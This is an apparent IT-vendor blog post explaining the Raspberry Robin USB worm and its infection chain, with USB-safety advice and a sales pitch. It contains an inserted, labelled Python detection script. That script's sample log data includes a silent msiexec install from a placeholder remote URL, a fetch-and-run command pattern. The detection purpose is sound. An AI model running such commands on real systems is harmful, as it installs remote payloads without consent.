Raspberry Robin

Storage devices such as USB drives have long been known to spread malware from one device to another. Recent analyses found that an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it, and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device displays an infected .LNK file. An msiexec process is then started through the command prompt. A .BAT file contains two commands that can be executed: one can manage various Windows features, and the other can configure Open Database Connectivity (ODBC). Combined, the two keep the threat hidden and make it difficult to locate on the network.

The Raspberry Robin infection process was found to escalate further, with compromised QNAP NAS (Network-Attached Storage) devices also affected. During this stage, once the .LNK file is downloaded, the hacker is able to retrieve the victim’s user and device names using HTTP requests. From the infected QNAP device, the malware then uses a malicious DLL (Dynamic-Link Library) to gain access to and take control of the entire system.
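One way to hunt for the chain described above (command prompt starting msiexec) in process-creation logs, as an added example that is not from the original post or from Red Canary. The event shape, field names, sample data and the rule that a URL on the msiexec command line raises severity are all assumptions of this example.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events (shape loosely follows Sysmon Event ID 1).
# Host names, paths and the URL are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmd": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c (constructed, content not relevant here)"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec /q /i "http://nas.example.invalid:8080/a/HOST01?alice"'},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec /i "C:\Installers\app.msi"'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c build.bat"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec /i "D:\tools\setup.msi"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def find_msiexec_chains(events):
    """Return one finding per msiexec.exe process whose parent is cmd.exe."""
    # Assumes PIDs are unique within the batch; real logs need a process GUID
    # or a time window because Windows reuses PIDs.
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]).lower() != "msiexec.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]).lower() != "cmd.exe":
            continue
        # A remote URL as the install source is rare for scripted installs,
        # so it is ranked above a local .msi path (assumption of this example).
        url = URL_RE.search(e["cmd"])
        findings.append({
            "pid": e["pid"],
            "severity": "high" if url else "review",
            "url": url.group(0) if url else None,
        })
    return findings

if __name__ == "__main__":
    for finding in find_msiexec_chains(SAMPLE_EVENTS):
        print(finding)
```

The "review" tier exists because legitimate batch installers also start msiexec from cmd.exe; only the combination with a remote URL is treated as high severity here.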

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, as with most malware in its initial stages of development, not much is known about Raspberry Robin. More research is required to determine how readily it spreads and what hackers intended when creating this worm. Although this is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

To keep yourself and your business safe from Raspberry Robin, treat all USB devices with intense scrutiny. This includes not inserting USB drives that do not belong to you or USB devices that were found lying around on the ground. Remember that a USB drive may not look suspicious from the outside, yet it can be compromised inside. Always think twice before plugging any unknown device into your computers.

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.
